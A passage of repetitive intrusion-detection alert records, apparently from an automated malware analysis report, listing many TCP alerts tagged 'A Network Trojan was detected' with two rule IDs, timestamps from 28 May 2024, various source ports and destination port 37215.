          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.891430
          SID:2829579
          Source Port:34032
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.089759
          SID:2829579
          Source Port:43152
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.552039
          SID:2835222
          Source Port:60770
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.868757
          SID:2835222
          Source Port:53662
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.048693
          SID:2829579
          Source Port:41372
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.485639
          SID:2835222
          Source Port:52172
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.655864
          SID:2829579
          Source Port:51560
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.214820
          SID:2835222
          Source Port:33128
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.153353
          SID:2829579
          Source Port:48922
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.186548
          SID:2829579
          Source Port:36344
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.175641
          SID:2835222
          Source Port:38540
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.611507
          SID:2829579
          Source Port:55426
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.147455
          SID:2829579
          Source Port:44554
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.325559
          SID:2835222
          Source Port:52556
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.156190
          SID:2829579
          Source Port:35908
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.665622
          SID:2835222
          Source Port:53286
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.226007
          SID:2829579
          Source Port:39324
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.290406
          SID:2835222
          Source Port:45926
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.537699
          SID:2829579
          Source Port:55282
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.266223
          SID:2829579
          Source Port:59568
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.269867
          SID:2835222
          Source Port:55844
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.438956
          SID:2835222
          Source Port:36992
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.157598
          SID:2835222
          Source Port:49186
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.885737
          SID:2829579
          Source Port:37546
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.473381
          SID:2829579
          Source Port:57020
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.102300
          SID:2829579
          Source Port:40452
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.804578
          SID:2829579
          Source Port:53822
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.922803
          SID:2829579
          Source Port:49242
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.427705
          SID:2835222
          Source Port:41184
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.963957
          SID:2835222
          Source Port:54534
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.964462
          SID:2835222
          Source Port:56438
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.656226
          SID:2835222
          Source Port:37304
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.948605
          SID:2835222
          Source Port:48902
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.268843
          SID:2829579
          Source Port:58756
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.154692
          SID:2829579
          Source Port:43604
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.326762
          SID:2835222
          Source Port:46374
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.680368
          SID:2829579
          Source Port:53192
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.941507
          SID:2829579
          Source Port:50856
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.473672
          SID:2835222
          Source Port:44830
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.728938
          SID:2835222
          Source Port:58740
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.307177
          SID:2829579
          Source Port:49646
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.848555
          SID:2835222
          Source Port:35050
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.131670
          SID:2835222
          Source Port:54506
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.299093
          SID:2835222
          Source Port:57094
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.861413
          SID:2829579
          Source Port:58932
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.485392
          SID:2835222
          Source Port:38994
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.435602
          SID:2829579
          Source Port:45320
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.213855
          SID:2835222
          Source Port:37122
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.232829
          SID:2835222
          Source Port:56088
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.299376
          SID:2829579
          Source Port:54318
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.926657
          SID:2835222
          Source Port:42078
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.229220
          SID:2835222
          Source Port:41878
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.271962
          SID:2835222
          Source Port:53822
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.266253
          SID:2835222
          Source Port:45926
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:56.336672
          SID:2829579
          Source Port:59282
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.681518
          SID:2829579
          Source Port:41484
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.151234
          SID:2835222
          Source Port:53868
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.975872
          SID:2829579
          Source Port:55900
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.332321
          SID:2835222
          Source Port:45096
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.177370
          SID:2829579
          Source Port:44552
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.324141
          SID:2835222
          Source Port:53144
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.352448
          SID:2835222
          Source Port:43840
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.195879
          SID:2829579
          Source Port:58136
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.525478
          SID:2829579
          Source Port:33216
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.552771
          SID:2835222
          Source Port:59716
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.419915
          SID:2829579
          Source Port:60174
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.879385
          SID:2835222
          Source Port:45646
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.021644
          SID:2829579
          Source Port:60496
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.964839
          SID:2829579
          Source Port:60218
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.846275
          SID:2835222
          Source Port:39116
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.709130
          SID:2835222
          Source Port:55656
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.206245
          SID:2835222
          Source Port:40604
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.659812
          SID:2829579
          Source Port:59566
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.298588
          SID:2829579
          Source Port:37066
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.953346
          SID:2829579
          Source Port:53874
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.800133
          SID:2829579
          Source Port:36078
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.591202
          SID:2829579
          Source Port:52372
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.618493
          SID:2829579
          Source Port:48718
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.551237
          SID:2835222
          Source Port:39160
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.680656
          SID:2835222
          Source Port:44968
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.188071
          SID:2835222
          Source Port:48670
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.177310
          SID:2829579
          Source Port:45120
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.330079
          SID:2829579
          Source Port:54892
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.083464
          SID:2829579
          Source Port:38854
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.446604
          SID:2829579
          Source Port:55598
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.485330
          SID:2829579
          Source Port:36674
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.996113
          SID:2835222
          Source Port:37942
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.297751
          SID:2835222
          Source Port:58500
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.178042
          SID:2829579
          Source Port:58064
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.591250
          SID:2829579
          Source Port:57684
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.401038
          SID:2835222
          Source Port:35228
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.590705
          SID:2829579
          Source Port:33964
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.922508
          SID:2835222
          Source Port:39302
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.800672
          SID:2829579
          Source Port:40366
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.067644
          SID:2835222
          Source Port:37798
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.652403
          SID:2829579
          Source Port:55246
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.626756
          SID:2835222
          Source Port:34826
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.402459
          SID:2835222
          Source Port:50242
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.593290
          SID:2829579
          Source Port:55978
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.215198
          SID:2829579
          Source Port:58206
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.154670
          SID:2835222
          Source Port:47176
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.680354
          SID:2829579
          Source Port:46844
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.842028
          SID:2829579
          Source Port:48288
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.548681
          SID:2829579
          Source Port:41548
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.040858
          SID:2835222
          Source Port:34708
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.635128
          SID:2835222
          Source Port:44394
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.211550
          SID:2835222
          Source Port:45920
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.067144
          SID:2835222
          Source Port:52494
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.293720
          SID:2835222
          Source Port:55730
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.399723
          SID:2829579
          Source Port:39318
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.962431
          SID:2829579
          Source Port:46668
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.334224
          SID:2829579
          Source Port:44756
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.528190
          SID:2835222
          Source Port:55498
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.176478
          SID:2835222
          Source Port:37640
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.487505
          SID:2835222
          Source Port:50970
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.537201
          SID:2835222
          Source Port:50776
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.662680
          SID:2835222
          Source Port:49496
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.816572
          SID:2829579
          Source Port:49428
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.590709
          SID:2829579
          Source Port:58950
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.152141
          SID:2829579
          Source Port:45158
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:56.336667
          SID:2829579
          Source Port:56648
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.033385
          SID:2835222
          Source Port:59594
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.764356
          SID:2829579
          Source Port:43384
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.272285
          SID:2835222
          Source Port:47894
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.305551
          SID:2835222
          Source Port:45338
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.196766
          SID:2835222
          Source Port:46592
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.737333
          SID:2829579
          Source Port:49880
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.965365
          SID:2835222
          Source Port:35124
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.923802
          SID:2829579
          Source Port:57996
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.273320
          SID:2835222
          Source Port:48934
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.756294
          SID:2829579
          Source Port:59372
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.482362
          SID:2829579
          Source Port:35928
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.033426
          SID:2829579
          Source Port:52730
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.067288
          SID:2829579
          Source Port:39804
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.208275
          SID:2835222
          Source Port:39774
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.290232
          SID:2829579
          Source Port:46482
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.195325
          SID:2829579
          Source Port:47362
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.530352
          SID:2835222
          Source Port:34932
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.796208
          SID:2835222
          Source Port:52158
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.528846
          SID:2835222
          Source Port:44954
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.794919
          SID:2829579
          Source Port:34814
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.466556
          SID:2835222
          Source Port:59770
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.694298
          SID:2829579
          Source Port:54848
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.177494
          SID:2835222
          Source Port:48860
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.548608
          SID:2835222
          Source Port:37806
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.795143
          SID:2829579
          Source Port:54388
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.039337
          SID:2829579
          Source Port:44758
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.326656
          SID:2829579
          Source Port:55528
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.743420
          SID:2829579
          Source Port:44956
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.187279
          SID:2829579
          Source Port:34728
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.818620
          SID:2835222
          Source Port:44114
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.685030
          SID:2835222
          Source Port:56898
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.190368
          SID:2835222
          Source Port:51632
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.923488
          SID:2835222
          Source Port:44410
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.711490
          SID:2835222
          Source Port:58640
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.860894
          SID:2829579
          Source Port:56232
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.511308
          SID:2829579
          Source Port:52888
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.683710
          SID:2829579
          Source Port:60648
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.483917
          SID:2835222
          Source Port:55724
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.687362
          SID:2835222
          Source Port:56732
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.605890
          SID:2835222
          Source Port:42178
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.840058
          SID:2835222
          Source Port:47858
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.135924
          SID:2835222
          Source Port:53188
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.233122
          SID:2835222
          Source Port:48982
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.187161
          SID:2829579
          Source Port:52010
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.891163
          SID:2829579
          Source Port:59680
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.157898
          SID:2829579
          Source Port:54858
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.871011
          SID:2829579
          Source Port:41752
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.188080
          SID:2835222
          Source Port:50476
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.213627
          SID:2835222
          Source Port:37780
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.469698
          SID:2835222
          Source Port:60592
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.325334
          SID:2835222
          Source Port:53148
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:56.336971
          SID:2835222
          Source Port:41636
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.472778
          SID:2829579
          Source Port:52856
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.980288
          SID:2835222
          Source Port:58660
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.717997
          SID:2829579
          Source Port:53366
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.044300
          SID:2835222
          Source Port:42538
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.590870
          SID:2835222
          Source Port:46344
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.840430
          SID:2829579
          Source Port:36058
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.755704
          SID:2829579
          Source Port:54938
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.683702
          SID:2829579
          Source Port:41134
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.230156
          SID:2835222
          Source Port:45002
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.426463
          SID:2829579
          Source Port:35646
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.978405
          SID:2829579
          Source Port:54922
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.041902
          SID:2835222
          Source Port:59614
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.943459
          SID:2835222
          Source Port:54690
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.609221
          SID:2829579
          Source Port:53166
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.498860
          SID:2829579
          Source Port:49446
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.707961
          SID:2835222
          Source Port:44402
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.474382
          SID:2835222
          Source Port:49638
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.115429
          SID:2835222
          Source Port:34960
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.328576
          SID:2829579
          Source Port:52828
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.424488
          SID:2829579
          Source Port:55088
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.923279
          SID:2829579
          Source Port:53938
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.778957
          SID:2829579
          Source Port:43226
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.744946
          SID:2829579
          Source Port:54490
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.271471
          SID:2835222
          Source Port:33806
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
